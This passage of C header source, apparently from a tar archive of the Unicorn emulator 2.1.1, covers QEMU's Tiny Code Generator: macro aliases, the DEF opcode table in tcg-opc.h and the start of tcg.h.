tcg_gen_trunc_tl_i32 tcg_gen_mov_i32 #define tcg_gen_trunc_i64_tl tcg_gen_extrl_i64_i32 #define tcg_gen_extu_i32_tl tcg_gen_mov_i32 #define tcg_gen_ext_i32_tl tcg_gen_mov_i32 #define tcg_gen_extu_tl_i64 tcg_gen_extu_i32_i64 #define tcg_gen_ext_tl_i64 tcg_gen_ext_i32_i64 #define tcg_gen_ext8u_tl tcg_gen_ext8u_i32 #define tcg_gen_ext8s_tl tcg_gen_ext8s_i32 #define tcg_gen_ext16u_tl tcg_gen_ext16u_i32 #define tcg_gen_ext16s_tl tcg_gen_ext16s_i32 #define tcg_gen_ext32u_tl tcg_gen_mov_i32 #define tcg_gen_ext32s_tl tcg_gen_mov_i32 #define tcg_gen_bswap16_tl tcg_gen_bswap16_i32 #define tcg_gen_bswap32_tl tcg_gen_bswap32_i32 #define tcg_gen_concat_tl_i64 tcg_gen_concat_i32_i64 #define tcg_gen_extr_i64_tl tcg_gen_extr_i64_i32 #define tcg_gen_andc_tl tcg_gen_andc_i32 #define tcg_gen_eqv_tl tcg_gen_eqv_i32 #define tcg_gen_nand_tl tcg_gen_nand_i32 #define tcg_gen_nor_tl tcg_gen_nor_i32 #define tcg_gen_orc_tl tcg_gen_orc_i32 #define tcg_gen_clz_tl tcg_gen_clz_i32 #define tcg_gen_ctz_tl tcg_gen_ctz_i32 #define tcg_gen_clzi_tl tcg_gen_clzi_i32 #define tcg_gen_ctzi_tl tcg_gen_ctzi_i32 #define tcg_gen_clrsb_tl tcg_gen_clrsb_i32 #define tcg_gen_ctpop_tl tcg_gen_ctpop_i32 #define tcg_gen_rotl_tl tcg_gen_rotl_i32 #define tcg_gen_rotli_tl tcg_gen_rotli_i32 #define tcg_gen_rotr_tl tcg_gen_rotr_i32 #define tcg_gen_rotri_tl tcg_gen_rotri_i32 #define tcg_gen_deposit_tl tcg_gen_deposit_i32 #define tcg_gen_deposit_z_tl tcg_gen_deposit_z_i32 #define tcg_gen_extract_tl tcg_gen_extract_i32 #define tcg_gen_sextract_tl tcg_gen_sextract_i32 #define tcg_gen_extract2_tl tcg_gen_extract2_i32 #define tcg_const_tl tcg_const_i32 #define tcg_const_local_tl tcg_const_local_i32 #define tcg_gen_movcond_tl tcg_gen_movcond_i32 #define tcg_gen_add2_tl tcg_gen_add2_i32 #define tcg_gen_sub2_tl tcg_gen_sub2_i32 #define tcg_gen_mulu2_tl tcg_gen_mulu2_i32 #define tcg_gen_muls2_tl tcg_gen_muls2_i32 #define tcg_gen_mulsu2_tl tcg_gen_mulsu2_i32 #define tcg_gen_smin_tl tcg_gen_smin_i32 #define tcg_gen_umin_tl tcg_gen_umin_i32 #define tcg_gen_smax_tl tcg_gen_smax_i32 #define tcg_gen_umax_tl tcg_gen_umax_i32 #define tcg_gen_atomic_cmpxchg_tl tcg_gen_atomic_cmpxchg_i32 #define tcg_gen_atomic_xchg_tl tcg_gen_atomic_xchg_i32 #define tcg_gen_atomic_fetch_add_tl tcg_gen_atomic_fetch_add_i32 #define tcg_gen_atomic_fetch_and_tl tcg_gen_atomic_fetch_and_i32 #define tcg_gen_atomic_fetch_or_tl tcg_gen_atomic_fetch_or_i32 #define tcg_gen_atomic_fetch_xor_tl tcg_gen_atomic_fetch_xor_i32 #define tcg_gen_atomic_fetch_smin_tl tcg_gen_atomic_fetch_smin_i32 #define tcg_gen_atomic_fetch_umin_tl tcg_gen_atomic_fetch_umin_i32 #define tcg_gen_atomic_fetch_smax_tl tcg_gen_atomic_fetch_smax_i32 #define tcg_gen_atomic_fetch_umax_tl tcg_gen_atomic_fetch_umax_i32 #define tcg_gen_atomic_add_fetch_tl tcg_gen_atomic_add_fetch_i32 #define tcg_gen_atomic_and_fetch_tl tcg_gen_atomic_and_fetch_i32 #define tcg_gen_atomic_or_fetch_tl tcg_gen_atomic_or_fetch_i32 #define tcg_gen_atomic_xor_fetch_tl tcg_gen_atomic_xor_fetch_i32 #define tcg_gen_atomic_smin_fetch_tl tcg_gen_atomic_smin_fetch_i32 #define tcg_gen_atomic_umin_fetch_tl tcg_gen_atomic_umin_fetch_i32 #define tcg_gen_atomic_smax_fetch_tl tcg_gen_atomic_smax_fetch_i32 #define tcg_gen_atomic_umax_fetch_tl tcg_gen_atomic_umax_fetch_i32 #define tcg_gen_dup_tl_vec tcg_gen_dup_i32_vec #endif #if UINTPTR_MAX == UINT32_MAX # define PTR i32 # define NAT TCGv_i32 #else # define PTR i64 # define NAT TCGv_i64 #endif static inline void tcg_gen_ld_ptr(TCGContext *tcg_ctx, TCGv_ptr r, TCGv_ptr a, intptr_t o) { glue(tcg_gen_ld_,PTR)(tcg_ctx, (NAT)r, a, o); } static inline void tcg_gen_st_ptr(TCGContext *tcg_ctx, TCGv_ptr r, TCGv_ptr a, intptr_t o) { glue(tcg_gen_st_, PTR)(tcg_ctx, (NAT)r, a, o); } static inline void tcg_gen_discard_ptr(TCGContext *tcg_ctx, TCGv_ptr a) { glue(tcg_gen_discard_,PTR)(tcg_ctx, (NAT)a); } static inline void tcg_gen_add_ptr(TCGContext *tcg_ctx, TCGv_ptr r, TCGv_ptr a, TCGv_ptr b) { glue(tcg_gen_add_,PTR)(tcg_ctx, (NAT)r, (NAT)a, (NAT)b); } static inline void tcg_gen_addi_ptr(TCGContext *tcg_ctx, TCGv_ptr r, TCGv_ptr a, intptr_t b) { glue(tcg_gen_addi_,PTR)(tcg_ctx, (NAT)r, (NAT)a, b); } static inline void tcg_gen_brcondi_ptr(TCGContext *tcg_ctx, TCGCond cond, TCGv_ptr a, intptr_t b, TCGLabel *label) { glue(tcg_gen_brcondi_,PTR)(tcg_ctx, cond, (NAT)a, b, label); } static inline void tcg_gen_ext_i32_ptr(TCGContext *tcg_ctx, TCGv_ptr r, TCGv_i32 a) { #if UINTPTR_MAX == UINT32_MAX tcg_gen_mov_i32(tcg_ctx, (NAT)r, a); #else tcg_gen_ext_i32_i64(tcg_ctx, (NAT)r, a); #endif } static inline void tcg_gen_trunc_i64_ptr(TCGContext *tcg_ctx, TCGv_ptr r, TCGv_i64 a) { #if UINTPTR_MAX == UINT32_MAX tcg_gen_extrl_i64_i32(tcg_ctx, (NAT)r, a); #else tcg_gen_mov_i64(tcg_ctx, (NAT)r, a); #endif } static inline void tcg_gen_extu_ptr_i64(TCGContext *tcg_ctx, TCGv_i64 r, TCGv_ptr a) { #if UINTPTR_MAX == UINT32_MAX tcg_gen_extu_i32_i64(tcg_ctx, r, (NAT)a); #else tcg_gen_mov_i64(tcg_ctx, r, (NAT)a); #endif } static inline void tcg_gen_trunc_ptr_i32(TCGContext *tcg_ctx, TCGv_i32 r, TCGv_ptr a) { #if UINTPTR_MAX == UINT32_MAX tcg_gen_mov_i32(tcg_ctx, r, (NAT)a); #else tcg_gen_extrl_i64_i32(tcg_ctx, r, (NAT)a); #endif } #undef PTR #undef NAT #endif /* TCG_TCG_OP_H */ ���������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/tcg/tcg-opc.h������������������������������������������������������������0000664�0000000�0000000�00000026756�14675241067�0020100�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Tiny Code Generator for QEMU * * Copyright (c) 2008 Fabrice Bellard * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ /* * DEF(name, oargs, iargs, cargs, flags) */ /* predefined ops */ DEF(discard, 1, 0, 0, TCG_OPF_NOT_PRESENT) DEF(set_label, 0, 0, 1, TCG_OPF_BB_END | TCG_OPF_NOT_PRESENT) /* variable number of parameters */ DEF(call, 0, 0, 3, TCG_OPF_CALL_CLOBBER | TCG_OPF_NOT_PRESENT) DEF(br, 0, 0, 1, TCG_OPF_BB_END) #ifndef _MSC_VER #define IMPL(X) (__builtin_constant_p(X) && (X) <= 0 ? TCG_OPF_NOT_PRESENT : 0) #else #define IMPL(X) ((X) <= 0 ? TCG_OPF_NOT_PRESENT : 0) #endif #if TCG_TARGET_REG_BITS == 32 # define IMPL64 TCG_OPF_64BIT | TCG_OPF_NOT_PRESENT #else # define IMPL64 TCG_OPF_64BIT #endif DEF(mb, 0, 0, 1, 0) DEF(mov_i32, 1, 1, 0, TCG_OPF_NOT_PRESENT) DEF(movi_i32, 1, 0, 1, TCG_OPF_NOT_PRESENT) DEF(setcond_i32, 1, 2, 1, 0) DEF(movcond_i32, 1, 4, 1, IMPL(TCG_TARGET_HAS_movcond_i32)) /* load/store */ DEF(ld8u_i32, 1, 1, 1, 0) DEF(ld8s_i32, 1, 1, 1, 0) DEF(ld16u_i32, 1, 1, 1, 0) DEF(ld16s_i32, 1, 1, 1, 0) DEF(ld_i32, 1, 1, 1, 0) DEF(st8_i32, 0, 2, 1, 0) DEF(st16_i32, 0, 2, 1, 0) DEF(st_i32, 0, 2, 1, 0) /* arith */ DEF(add_i32, 1, 2, 0, 0) DEF(sub_i32, 1, 2, 0, 0) DEF(mul_i32, 1, 2, 0, 0) DEF(div_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_div_i32)) DEF(divu_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_div_i32)) DEF(rem_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_rem_i32)) DEF(remu_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_rem_i32)) DEF(div2_i32, 2, 3, 0, IMPL(TCG_TARGET_HAS_div2_i32)) DEF(divu2_i32, 2, 3, 0, IMPL(TCG_TARGET_HAS_div2_i32)) DEF(and_i32, 1, 2, 0, 0) DEF(or_i32, 1, 2, 0, 0) DEF(xor_i32, 1, 2, 0, 0) /* shifts/rotates */ DEF(shl_i32, 1, 2, 0, 0) DEF(shr_i32, 1, 2, 0, 0) DEF(sar_i32, 1, 2, 0, 0) DEF(rotl_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_rot_i32)) DEF(rotr_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_rot_i32)) DEF(deposit_i32, 1, 2, 2, IMPL(TCG_TARGET_HAS_deposit_i32)) DEF(extract_i32, 1, 1, 2, IMPL(TCG_TARGET_HAS_extract_i32)) DEF(sextract_i32, 1, 1, 2, IMPL(TCG_TARGET_HAS_sextract_i32)) DEF(extract2_i32, 1, 2, 1, IMPL(TCG_TARGET_HAS_extract2_i32)) DEF(brcond_i32, 0, 2, 2, TCG_OPF_BB_END) DEF(add2_i32, 2, 4, 0, IMPL(TCG_TARGET_HAS_add2_i32)) DEF(sub2_i32, 2, 4, 0, IMPL(TCG_TARGET_HAS_sub2_i32)) DEF(mulu2_i32, 2, 2, 0, IMPL(TCG_TARGET_HAS_mulu2_i32)) DEF(muls2_i32, 2, 2, 0, IMPL(TCG_TARGET_HAS_muls2_i32)) DEF(muluh_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_muluh_i32)) DEF(mulsh_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_mulsh_i32)) DEF(brcond2_i32, 0, 4, 2, TCG_OPF_BB_END | IMPL(TCG_TARGET_REG_BITS == 32)) DEF(setcond2_i32, 1, 4, 1, IMPL(TCG_TARGET_REG_BITS == 32)) DEF(ext8s_i32, 1, 1, 0, IMPL(TCG_TARGET_HAS_ext8s_i32)) DEF(ext16s_i32, 1, 1, 0, IMPL(TCG_TARGET_HAS_ext16s_i32)) DEF(ext8u_i32, 1, 1, 0, IMPL(TCG_TARGET_HAS_ext8u_i32)) DEF(ext16u_i32, 1, 1, 0, IMPL(TCG_TARGET_HAS_ext16u_i32)) DEF(bswap16_i32, 1, 1, 0, IMPL(TCG_TARGET_HAS_bswap16_i32)) DEF(bswap32_i32, 1, 1, 0, IMPL(TCG_TARGET_HAS_bswap32_i32)) DEF(not_i32, 1, 1, 0, IMPL(TCG_TARGET_HAS_not_i32)) DEF(neg_i32, 1, 1, 0, IMPL(TCG_TARGET_HAS_neg_i32)) #ifdef _MSC_VER DEF(andc_i32, 1, 2, 0, 0) #else DEF(andc_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_andc_i32)) #endif DEF(orc_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_orc_i32)) DEF(eqv_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_eqv_i32)) DEF(nand_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_nand_i32)) DEF(nor_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_nor_i32)) DEF(clz_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_clz_i32)) DEF(ctz_i32, 1, 2, 0, IMPL(TCG_TARGET_HAS_ctz_i32)) #ifdef _MSC_VER DEF(ctpop_i32, 1, 1, 0, 0) #else DEF(ctpop_i32, 1, 1, 0, IMPL(TCG_TARGET_HAS_ctpop_i32)) #endif DEF(mov_i64, 1, 1, 0, TCG_OPF_64BIT | TCG_OPF_NOT_PRESENT) DEF(movi_i64, 1, 0, 1, TCG_OPF_64BIT | TCG_OPF_NOT_PRESENT) DEF(setcond_i64, 1, 2, 1, IMPL64) DEF(movcond_i64, 1, 4, 1, IMPL64 | IMPL(TCG_TARGET_HAS_movcond_i64)) /* load/store */ DEF(ld8u_i64, 1, 1, 1, IMPL64) DEF(ld8s_i64, 1, 1, 1, IMPL64) DEF(ld16u_i64, 1, 1, 1, IMPL64) DEF(ld16s_i64, 1, 1, 1, IMPL64) DEF(ld32u_i64, 1, 1, 1, IMPL64) DEF(ld32s_i64, 1, 1, 1, IMPL64) DEF(ld_i64, 1, 1, 1, IMPL64) DEF(st8_i64, 0, 2, 1, IMPL64) DEF(st16_i64, 0, 2, 1, IMPL64) DEF(st32_i64, 0, 2, 1, IMPL64) DEF(st_i64, 0, 2, 1, IMPL64) /* arith */ DEF(add_i64, 1, 2, 0, IMPL64) DEF(sub_i64, 1, 2, 0, IMPL64) DEF(mul_i64, 1, 2, 0, IMPL64) DEF(div_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_div_i64)) DEF(divu_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_div_i64)) DEF(rem_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_rem_i64)) DEF(remu_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_rem_i64)) DEF(div2_i64, 2, 3, 0, IMPL64 | IMPL(TCG_TARGET_HAS_div2_i64)) DEF(divu2_i64, 2, 3, 0, IMPL64 | IMPL(TCG_TARGET_HAS_div2_i64)) DEF(and_i64, 1, 2, 0, IMPL64) DEF(or_i64, 1, 2, 0, IMPL64) DEF(xor_i64, 1, 2, 0, IMPL64) /* shifts/rotates */ DEF(shl_i64, 1, 2, 0, IMPL64) DEF(shr_i64, 1, 2, 0, IMPL64) DEF(sar_i64, 1, 2, 0, IMPL64) DEF(rotl_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_rot_i64)) DEF(rotr_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_rot_i64)) DEF(deposit_i64, 1, 2, 2, IMPL64 | IMPL(TCG_TARGET_HAS_deposit_i64)) DEF(extract_i64, 1, 1, 2, IMPL64 | IMPL(TCG_TARGET_HAS_extract_i64)) DEF(sextract_i64, 1, 1, 2, IMPL64 | IMPL(TCG_TARGET_HAS_sextract_i64)) DEF(extract2_i64, 1, 2, 1, IMPL64 | IMPL(TCG_TARGET_HAS_extract2_i64)) /* size changing ops */ DEF(ext_i32_i64, 1, 1, 0, IMPL64) DEF(extu_i32_i64, 1, 1, 0, IMPL64) DEF(extrl_i64_i32, 1, 1, 0, IMPL(TCG_TARGET_HAS_extrl_i64_i32) | (TCG_TARGET_REG_BITS == 32 ? TCG_OPF_NOT_PRESENT : 0)) DEF(extrh_i64_i32, 1, 1, 0, IMPL(TCG_TARGET_HAS_extrh_i64_i32) | (TCG_TARGET_REG_BITS == 32 ? TCG_OPF_NOT_PRESENT : 0)) DEF(brcond_i64, 0, 2, 2, TCG_OPF_BB_END | IMPL64) DEF(ext8s_i64, 1, 1, 0, IMPL64 | IMPL(TCG_TARGET_HAS_ext8s_i64)) DEF(ext16s_i64, 1, 1, 0, IMPL64 | IMPL(TCG_TARGET_HAS_ext16s_i64)) DEF(ext32s_i64, 1, 1, 0, IMPL64 | IMPL(TCG_TARGET_HAS_ext32s_i64)) DEF(ext8u_i64, 1, 1, 0, IMPL64 | IMPL(TCG_TARGET_HAS_ext8u_i64)) DEF(ext16u_i64, 1, 1, 0, IMPL64 | IMPL(TCG_TARGET_HAS_ext16u_i64)) DEF(ext32u_i64, 1, 1, 0, IMPL64 | IMPL(TCG_TARGET_HAS_ext32u_i64)) DEF(bswap16_i64, 1, 1, 0, IMPL64 | IMPL(TCG_TARGET_HAS_bswap16_i64)) DEF(bswap32_i64, 1, 1, 0, IMPL64 | IMPL(TCG_TARGET_HAS_bswap32_i64)) DEF(bswap64_i64, 1, 1, 0, IMPL64 | IMPL(TCG_TARGET_HAS_bswap64_i64)) DEF(not_i64, 1, 1, 0, IMPL64 | IMPL(TCG_TARGET_HAS_not_i64)) DEF(neg_i64, 1, 1, 0, IMPL64 | IMPL(TCG_TARGET_HAS_neg_i64)) #ifdef _MSC_VER DEF(andc_i64, 1, 2, 0, IMPL64) #else DEF(andc_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_andc_i64)) #endif DEF(orc_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_orc_i64)) DEF(eqv_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_eqv_i64)) DEF(nand_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_nand_i64)) DEF(nor_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_nor_i64)) DEF(clz_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_clz_i64)) DEF(ctz_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_ctz_i64)) #ifdef _MSC_VER DEF(ctpop_i64, 1, 1, 0, IMPL64) #else DEF(ctpop_i64, 1, 1, 0, IMPL64 | IMPL(TCG_TARGET_HAS_ctpop_i64)) #endif DEF(add2_i64, 2, 4, 0, IMPL64 | IMPL(TCG_TARGET_HAS_add2_i64)) DEF(sub2_i64, 2, 4, 0, IMPL64 | IMPL(TCG_TARGET_HAS_sub2_i64)) DEF(mulu2_i64, 2, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_mulu2_i64)) DEF(muls2_i64, 2, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_muls2_i64)) DEF(muluh_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_muluh_i64)) DEF(mulsh_i64, 1, 2, 0, IMPL64 | IMPL(TCG_TARGET_HAS_mulsh_i64)) #define TLADDR_ARGS (TARGET_LONG_BITS <= TCG_TARGET_REG_BITS ? 1 : 2) #define DATA64_ARGS (TCG_TARGET_REG_BITS == 64 ? 1 : 2) /* QEMU specific */ DEF(insn_start, 0, 0, TLADDR_ARGS * TARGET_INSN_START_WORDS, TCG_OPF_NOT_PRESENT) DEF(exit_tb, 0, 0, 1, TCG_OPF_BB_EXIT | TCG_OPF_BB_END) DEF(goto_tb, 0, 0, 1, TCG_OPF_BB_EXIT | TCG_OPF_BB_END) DEF(goto_ptr, 0, 1, 0, TCG_OPF_BB_EXIT | TCG_OPF_BB_END | IMPL(TCG_TARGET_HAS_goto_ptr)) DEF(qemu_ld_i32, 1, TLADDR_ARGS, 1, TCG_OPF_CALL_CLOBBER | TCG_OPF_SIDE_EFFECTS) DEF(qemu_st_i32, 0, TLADDR_ARGS + 1, 1, TCG_OPF_CALL_CLOBBER | TCG_OPF_SIDE_EFFECTS) DEF(qemu_ld_i64, DATA64_ARGS, TLADDR_ARGS, 1, TCG_OPF_CALL_CLOBBER | TCG_OPF_SIDE_EFFECTS | TCG_OPF_64BIT) DEF(qemu_st_i64, 0, TLADDR_ARGS + DATA64_ARGS, 1, TCG_OPF_CALL_CLOBBER | TCG_OPF_SIDE_EFFECTS | TCG_OPF_64BIT) /* Host vector support. */ #define IMPLVEC TCG_OPF_VECTOR | IMPL(TCG_TARGET_MAYBE_vec) DEF(mov_vec, 1, 1, 0, TCG_OPF_VECTOR | TCG_OPF_NOT_PRESENT) DEF(dupi_vec, 1, 0, 1, TCG_OPF_VECTOR | TCG_OPF_NOT_PRESENT) DEF(dup_vec, 1, 1, 0, IMPLVEC) DEF(dup2_vec, 1, 2, 0, IMPLVEC | IMPL(TCG_TARGET_REG_BITS == 32)) DEF(ld_vec, 1, 1, 1, IMPLVEC) DEF(st_vec, 0, 2, 1, IMPLVEC) DEF(dupm_vec, 1, 1, 1, IMPLVEC) DEF(add_vec, 1, 2, 0, IMPLVEC) DEF(sub_vec, 1, 2, 0, IMPLVEC) DEF(mul_vec, 1, 2, 0, IMPLVEC | IMPL(TCG_TARGET_HAS_mul_vec)) DEF(neg_vec, 1, 1, 0, IMPLVEC | IMPL(TCG_TARGET_HAS_neg_vec)) DEF(abs_vec, 1, 1, 0, IMPLVEC | IMPL(TCG_TARGET_HAS_abs_vec)) DEF(ssadd_vec, 1, 2, 0, IMPLVEC | IMPL(TCG_TARGET_HAS_sat_vec)) DEF(usadd_vec, 1, 2, 0, IMPLVEC | IMPL(TCG_TARGET_HAS_sat_vec)) DEF(sssub_vec, 1, 2, 0, IMPLVEC | IMPL(TCG_TARGET_HAS_sat_vec)) DEF(ussub_vec, 1, 2, 0, IMPLVEC | IMPL(TCG_TARGET_HAS_sat_vec)) DEF(smin_vec, 1, 2, 0, IMPLVEC | IMPL(TCG_TARGET_HAS_minmax_vec)) DEF(umin_vec, 1, 2, 0, IMPLVEC | IMPL(TCG_TARGET_HAS_minmax_vec)) DEF(smax_vec, 1, 2, 0, IMPLVEC | IMPL(TCG_TARGET_HAS_minmax_vec)) DEF(umax_vec, 1, 2, 0, IMPLVEC | IMPL(TCG_TARGET_HAS_minmax_vec)) DEF(and_vec, 1, 2, 0, IMPLVEC) DEF(or_vec, 1, 2, 0, IMPLVEC) DEF(xor_vec, 1, 2, 0, IMPLVEC) DEF(andc_vec, 1, 2, 0, IMPLVEC | IMPL(TCG_TARGET_HAS_andc_vec)) DEF(orc_vec, 1, 2, 0, IMPLVEC | IMPL(TCG_TARGET_HAS_orc_vec)) DEF(not_vec, 1, 1, 0, IMPLVEC | IMPL(TCG_TARGET_HAS_not_vec)) DEF(shli_vec, 1, 1, 1, IMPLVEC | IMPL(TCG_TARGET_HAS_shi_vec)) DEF(shri_vec, 1, 1, 1, IMPLVEC | IMPL(TCG_TARGET_HAS_shi_vec)) DEF(sari_vec, 1, 1, 1, IMPLVEC | IMPL(TCG_TARGET_HAS_shi_vec)) DEF(shls_vec, 1, 2, 0, IMPLVEC | IMPL(TCG_TARGET_HAS_shs_vec)) DEF(shrs_vec, 1, 2, 0, IMPLVEC | IMPL(TCG_TARGET_HAS_shs_vec)) DEF(sars_vec, 1, 2, 0, IMPLVEC | IMPL(TCG_TARGET_HAS_shs_vec)) #ifdef _MSC_VER DEF(shlv_vec, 1, 2, 0, IMPLVEC) DEF(shrv_vec, 1, 2, 0, IMPLVEC) DEF(sarv_vec, 1, 2, 0, IMPLVEC) #else DEF(shlv_vec, 1, 2, 0, IMPLVEC | IMPL(TCG_TARGET_HAS_shv_vec)) DEF(shrv_vec, 1, 2, 0, IMPLVEC | IMPL(TCG_TARGET_HAS_shv_vec)) DEF(sarv_vec, 1, 2, 0, IMPLVEC | IMPL(TCG_TARGET_HAS_shv_vec)) #endif DEF(cmp_vec, 1, 2, 1, IMPLVEC) DEF(bitsel_vec, 1, 3, 0, IMPLVEC | IMPL(TCG_TARGET_HAS_bitsel_vec)) DEF(cmpsel_vec, 1, 4, 1, IMPLVEC | IMPL(TCG_TARGET_HAS_cmpsel_vec)) DEF(last_generic, 0, 0, 0, TCG_OPF_NOT_PRESENT) #if TCG_TARGET_MAYBE_vec #include "tcg-target.opc.h" #endif #undef TLADDR_ARGS #undef DATA64_ARGS #undef IMPL #undef IMPL64 #undef IMPLVEC #undef DEF ������������������unicorn-2.1.1/qemu/include/tcg/tcg.h����������������������������������������������������������������0000664�0000000�0000000�00000145012�14675241067�0017304�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Tiny Code Generator for QEMU * * Copyright (c) 2008 Fabrice Bellard * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #ifndef TCG_H #define TCG_H #include "cpu.h" #include "exec/memop.h" #include "exec/tb-context.h" #include "qemu/bitops.h" #include "qemu/queue.h" #include "tcg/tcg-mo.h" #include "tcg-target.h" #include "tcg-apple-jit.h" #include "qemu/int128.h" /* XXX: make safe guess about sizes */ #define MAX_OP_PER_INSTR 266 #if HOST_LONG_BITS == 32 #define MAX_OPC_PARAM_PER_ARG 2 #else #define MAX_OPC_PARAM_PER_ARG 1 #endif #define MAX_OPC_PARAM_IARGS 6 #define MAX_OPC_PARAM_OARGS 1 #define MAX_OPC_PARAM_ARGS (MAX_OPC_PARAM_IARGS + MAX_OPC_PARAM_OARGS) /* A Call op needs up to 4 + 2N parameters on 32-bit archs, * and up to 4 + N parameters on 64-bit archs * (N = number of input arguments + output arguments). */ #define MAX_OPC_PARAM (4 + (MAX_OPC_PARAM_PER_ARG * MAX_OPC_PARAM_ARGS)) #define CPU_TEMP_BUF_NLONGS 128 /* Default target word size to pointer size. */ #ifndef TCG_TARGET_REG_BITS # if UINTPTR_MAX == UINT32_MAX # define TCG_TARGET_REG_BITS 32 # elif UINTPTR_MAX == UINT64_MAX # define TCG_TARGET_REG_BITS 64 # else # error Unknown pointer size for tcg target # endif #endif #if TCG_TARGET_REG_BITS == 32 typedef int32_t tcg_target_long; typedef uint32_t tcg_target_ulong; #define TCG_PRIlx PRIx32 #define TCG_PRIld PRId32 #elif TCG_TARGET_REG_BITS == 64 typedef int64_t tcg_target_long; typedef uint64_t tcg_target_ulong; #define TCG_PRIlx PRIx64 #define TCG_PRIld PRId64 #else #error unsupported #endif /* Oversized TCG guests make things like MTTCG hard * as we can't use atomics for cputlb updates. */ #if TARGET_LONG_BITS > TCG_TARGET_REG_BITS #define TCG_OVERSIZED_GUEST 1 #else #define TCG_OVERSIZED_GUEST 0 #endif #if TCG_TARGET_NB_REGS <= 32 typedef uint32_t TCGRegSet; #elif TCG_TARGET_NB_REGS <= 64 typedef uint64_t TCGRegSet; #else #error unsupported #endif #if TCG_TARGET_REG_BITS == 32 /* Turn some undef macros into false macros. */ #define TCG_TARGET_HAS_extrl_i64_i32 0 #define TCG_TARGET_HAS_extrh_i64_i32 0 #define TCG_TARGET_HAS_div_i64 0 #define TCG_TARGET_HAS_rem_i64 0 #define TCG_TARGET_HAS_div2_i64 0 #define TCG_TARGET_HAS_rot_i64 0 #define TCG_TARGET_HAS_ext8s_i64 0 #define TCG_TARGET_HAS_ext16s_i64 0 #define TCG_TARGET_HAS_ext32s_i64 0 #define TCG_TARGET_HAS_ext8u_i64 0 #define TCG_TARGET_HAS_ext16u_i64 0 #define TCG_TARGET_HAS_ext32u_i64 0 #define TCG_TARGET_HAS_bswap16_i64 0 #define TCG_TARGET_HAS_bswap32_i64 0 #define TCG_TARGET_HAS_bswap64_i64 0 #define TCG_TARGET_HAS_neg_i64 0 #define TCG_TARGET_HAS_not_i64 0 #define TCG_TARGET_HAS_andc_i64 0 #define TCG_TARGET_HAS_orc_i64 0 #define TCG_TARGET_HAS_eqv_i64 0 #define TCG_TARGET_HAS_nand_i64 0 #define TCG_TARGET_HAS_nor_i64 0 #define TCG_TARGET_HAS_clz_i64 0 #define TCG_TARGET_HAS_ctz_i64 0 #define TCG_TARGET_HAS_ctpop_i64 0 #define TCG_TARGET_HAS_deposit_i64 0 #define 